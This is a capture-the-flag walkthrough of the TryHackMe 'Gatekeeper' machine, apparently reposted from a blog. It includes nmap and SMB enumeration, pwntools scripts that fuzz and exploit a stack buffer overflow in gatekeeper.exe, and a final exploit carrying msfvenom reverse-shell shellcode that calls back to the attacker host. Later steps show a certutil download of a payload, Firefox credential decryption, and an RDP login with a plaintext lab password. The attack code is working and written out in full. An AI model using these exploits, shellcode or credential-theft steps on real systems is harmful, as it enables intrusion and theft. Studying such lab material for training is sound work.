tryhackme-Gatekeeper

news/2024/9/20 8:44:00/Article source: https://www.cnblogs.com/Junglezt/p/18301641

Information gathering

First, run a port scan with nmap. The results are below.

nmap -sT -p- --min-rate 10000 -oA openPort
nmap -sV -O -A -p port1,port2,portN -oA version
nmap --script=smb..  -p 135,139,445 -oA 445Port
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after:  2025-01-12T03:05:08
| rdp-ntlm-info: 
|   Target_Name: GATEKEEPER
|   NetBIOS_Domain_Name: GATEKEEPER
|   NetBIOS_Computer_Name: GATEKEEPER
|   DNS_Domain_Name: gatekeeper
|   DNS_Computer_Name: gatekeeper
|   Product_Version: 6.1.7601
|_  System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49163/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T23:10:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time: 
|   date: 2024-07-14T03:10:07
|_  start_date: 2024-07-14T03:05:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   249.25 ms 10.9.0.1
2   249.34 ms 10.10.130.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.100\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ

# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds

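The scan results show that the open ports useful to us are 445, 3389 and 31337.
First, in the scan results above, port 445 exposes a Users share with read access. Connecting to it reveals the program gatekeeper.exe, which I downloaded.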
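The guest-readable Users share is what exposed gatekeeper.exe. As an added example (not from the original post), this parser flags disk shares that a guest or anonymous session can read in smb-enum-shares output; the function names are hypothetical and the sample is abridged from the scan above.

```python
import re

# Abridged from the smb-enum-shares output above (C$ and Comment lines dropped).
SCAN = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.130.100\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|_    Current user access: READ
"""

SHARE = re.compile(r"^\|[ _]+(\\\\\S+\\[^:]+):\s*$")
FIELD = re.compile(r"^\|[ _]+([A-Za-z_ ]+?):\s*(.*?)\s*$")


def parse_shares(text):
    """Return (account_used, {share_path: {field: value}})."""
    account, shares, current = None, {}, None
    for line in text.splitlines():
        share, field = SHARE.match(line), FIELD.match(line)
        if share:
            current = shares.setdefault(share.group(1), {})
        elif field and field.group(1) == "account_used":
            account = field.group(2)
        elif field and current is not None:
            current[field.group(1)] = field.group(2)
    return account, shares


def exposed_disk_shares(text):
    """Disk shares that the guest or anonymous session can read."""
    account, shares = parse_shares(text)
    hits = []
    for path, f in shares.items():
        anon = f.get("Anonymous access", "<none>")
        user = f.get("Current user access", "<none>")
        is_disk = f.get("Type", "").startswith("STYPE_DISKTREE")  # skips IPC$
        if is_disk and (anon != "<none>" or (account == "guest" and user != "<none>")):
            hits.append((path, account, user))
    return hits
```

On the sample, only the Users share is reported; ADMIN$ grants the guest session no access and IPC$ is not file storage.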

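Run it in a local virtual machine.

It enters a listening state, so it has presumably opened a port. Given port 31337 in the scan results, I guessed that this program opens port 31337. Check with netstat -an -p tcp.

Connect with nc to take a look.

The program may have a stack overflow vulnerability. Connect to port 31337 on the target to see whether it behaves the same as this program.

It is the same program.

The next step is to debug and exploit the stack overflow in this program with a debugger. The steps are similar to those studied previously, so they are not explained in detail here.

Vulnerability debugging

I wrote a simple fuzzing script with pwntools.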

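import time
from pwn import *
# context(log_level="debug")

padding = b"A" * 50
while True:
    try:
        # Open a new connection for each probe and send the current buffer
        p = remote("192.168.226.132", 31337)
        p.sendline(padding)
        print(f"send {len(padding)} bytes Test!")
        p.recv()
    except Exception:
        # Connection refused or closed: the service has probably crashed
        print(f"at {len(padding)} bytes error")
    # Grow the buffer by 50 bytes for the next round
    padding += b"A" * 50
    time.sleep(1)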

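The script adds 50 more characters to the buffer on each iteration. Run the program under a debugger.

Run the script.


The script hung at 150 characters. Next, test which character position causes the overflow. I wrote the following script for this.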

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b""

p = remote("10.10.163.211", 31337)
p.sendline(payload)
p.recv()

Generate 150 characters with msf-pattern_create and place them in the payload += b"" line.

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

p = remote("10.10.163.211", 31337)
p.sendline(payload)
p.recv()

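Then restart the program and run the script.

Copy the EIP value and look up its offset in the pattern with msf-pattern_offset.


The buffer size is 146. Put this value in the offset variable.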

offset = 146
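How the offset lookup works, as an added example that is not part of the original post: it rebuilds the Metasploit-style pattern used above and locates the four bytes that reach EIP. The EIP value 0x39654138 is not quoted on the page; it is derived here from the pattern and the stated offset of 146, and the function names are hypothetical.

```python
import itertools
import string
import struct

PATTERN_LEN = 150   # length passed to msf-pattern_create on the page
OFFSET = 146        # offset reported on the page


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...Aa9Ab0...: upper, lower, digit triples."""
    sets = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
    triples = ("".join(t) for t in itertools.product(*sets))
    need = -(-length // 3)  # ceiling division: triples required
    return "".join(itertools.islice(triples, need))[:length].encode()


def eip_at(offset, length):
    """Value EIP holds if the saved return address starts at `offset`."""
    chunk = pattern_create(length)[offset:offset + 4]
    if len(chunk) < 4:
        return None  # pattern too short to cover the return address
    return struct.unpack("<I", chunk)[0]  # x86 loads the bytes little-endian


def pattern_offset(eip, length):
    """Inverse lookup: where in the pattern the bytes seen in EIP start."""
    idx = pattern_create(length).find(struct.pack("<I", eip))
    return None if idx < 0 else idx


if __name__ == "__main__":
    eip = eip_at(OFFSET, PATTERN_LEN)  # derived value, not taken from the page
    print(hex(eip), pattern_offset(eip, PATTERN_LEN))
```

With the return address at bytes 146 to 149, a 100-byte probe cannot reach it and a 150-byte probe covers it exactly, which is consistent with the fuzzing script stalling at 150.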

Then remove the earlier junk characters from the script and add the line payload += b"BBBB".

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"

p = remote("192.168.226.132", 31337)
p.sendline(payload)
p.recv()

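Restart the program and run the script again. This run verifies control of EIP: the EIP value should be overwritten with 42424242.


It worked.
Next, generate a byte array of all characters except \x00 and test for bad characters.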

!mona bytearray -b "\x00"


Add the bad characters to the script.

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

p = remote("192.168.226.132", 31337)
p.sendline(payload)
p.recv()

Restart the program and run the script again.


Copy the ESP value and run the mona plugin to find the bad characters.

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4


The bad characters are \x00 and \x0a. Next, look for a jmp esp instruction.

!mona jmp -r esp -cpb "\x00\x0a"


Write the address in little-endian byte order in place of BBBB.

payload += b"\xc3\x14\x04\x08"	# 0x080414c3 

Next, generate the shellcode and append it to the payload.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

For the shellcode to run properly, some NOPs (\x90) need to be added as padding. The final script is as follows.

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"\xc3\x14\x04\x08"	# 0x080414c3 
payload += b"\x90" * 16
payload += (b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"b"\x26"
)

p = remote("192.168.226.132", 31337)
p.sendline(payload)
p.recv()

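Restart the program, listen on port 4444, and run the script to get a reverse shell.

Getting the flag

The same steps, with only the IP changed, give a reverse shell on the target.

Get user.txt.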

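Privilege escalation

Although it did not succeed, I'll record my thinking here. When generating the reverse shell code I could have used a meterpreter payload directly, but what I generated was a plain shell, so I needed to upgrade it to a meterpreter session.
So I generated a shell.exe and served it with python -m http.server 80. The target downloaded it with certutil -split -f -urlcache, and I got a meterpreter session.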
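From the defender's side, certutil used as a downloader is visible in process-creation logs. This is an added detection example, not from the original post; the command lines are constructed and the function names are hypothetical.

```python
import re

# Constructed process-creation command lines (for example Sysmon Event ID 1
# CommandLine values); hosts use the 192.0.2.0/24 documentation range.
EVENTS = [
    r"certutil -split -f -urlcache http://192.0.2.10/shell.exe",
    r"C:\Windows\System32\certutil.exe -hashfile C:\Users\Public\a.zip SHA256",
    r'"C:\Windows\System32\CertUtil.exe" /URLCache /f http://192.0.2.10/x.bin x.bin',
    r"certutil -urlcache *",
    r"cmd /c echo certutil -urlcache http://192.0.2.10/ >> notes.txt",
]

TOKEN = re.compile(r'"[^"]*"|\S+')
URL = re.compile(r"^(?:https?|ftp)://", re.I)


def certutil_download(cmdline):
    """Return the URL fetched if cmdline runs certutil as a downloader, else None."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not tokens:
        return None
    # Match on the executable name, not on a substring of the whole line.
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    # certutil accepts both -switch and /switch, in any letter case.
    switches = {t[1:].lower() for t in tokens[1:] if t[:1] in ("-", "/")}
    urls = [t for t in tokens[1:] if URL.match(t)]
    if "urlcache" in switches and urls:
        return urls[0]
    return None


def flag_events(events):
    """Indices and URLs of the events that match."""
    found = []
    for i, cmdline in enumerate(events):
        url = certutil_download(cmdline)
        if url:
            found.append((i, url))
    return found
```

Only the first and third sample events match: the hash, cache-listing and echo lines are ignored because they lack the switch, a URL, or certutil as the executable.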

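Next I tried post/multi/recon/local_exploit_suggester to look for possible privilege escalation paths.

When I tried the last one I did not get a shell, and I don't know why.

Then winPEAS produced no output, and manual enumeration turned up nothing of practical use, so I was out of ideas. After consulting a blog I found that the answer is the credentials saved in Firefox.
Use firefox_creds to save the credentials.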


I renamed the files.

Next, a script from GitHub is needed to parse these credentials: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
Running it yields the credentials for the mayor user.

python firefox_decrypt.py ./firefox

The ./firefox folder holds all of the exported credentials.

Then connect to the target with xfreerdp.

xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard

Get root.txt.

End of the lab.
